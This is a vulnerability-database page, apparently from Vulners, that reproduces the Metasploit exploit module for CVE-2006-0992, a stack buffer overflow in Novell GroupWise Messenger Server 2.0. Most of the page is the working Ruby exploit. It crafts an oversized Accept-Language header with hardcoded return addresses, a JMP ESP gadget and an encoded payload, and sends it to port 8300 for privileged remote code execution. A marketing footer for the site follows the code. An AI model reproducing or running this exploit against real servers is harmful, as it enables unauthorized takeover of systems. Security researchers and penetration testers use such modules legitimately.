Lucene search

K

Novell Messenger Server 2.0 Accept-Language Overflow

🗓️ 14 Apr 2006 20:15:22Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 10 Views

Novell Messenger Server 2.0 Accept-Language Overflow. Stack buffer overflow triggered by HTTP request with Accept-Language header > 16 bytes, leading to stack address overwrite and limited usable payloads

Show more
Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell Messenger Server 2.0 Accept-Language Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Novell GroupWise
        Messenger Server v2.0. This flaw is triggered by any HTTP
        request with an Accept-Language header greater than 16 bytes.
        To overwrite the return address on the stack, we must first
        pass a memcpy() operation that uses pointers we supply. Due to the
        large list of restricted characters and the limitations of the current
        encoder modules, very few payloads are usable.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-0992'],
          ['OSVDB', '24617'],
          ['BID', '17503'],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'           => 500,
          'BadChars'        => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Groupwise Messenger DClient.dll v10510.37', { 'Rets' =>  [0x6103c3d3, 0x61041010] }],
        ],
      'DisclosureDate' => '2006-04-13'))

    register_options( [ Opt::RPORT(8300) ])
  end

  def exploit
    connect

    lang = rand_text_alphanumeric(1900)
    lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
    lang[272, 4] = [target['Rets'][1]].pack('V') # DST
    lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
    lang[268, 2] = "\xeb\x06"
    lang[276, payload.encoded.length] = payload.encoded

    res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"

    print_status("Trying target address 0x%.8x..." % target['Rets'][0])
    sock.put(res)
    sock.close

    handler
    disconnect
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo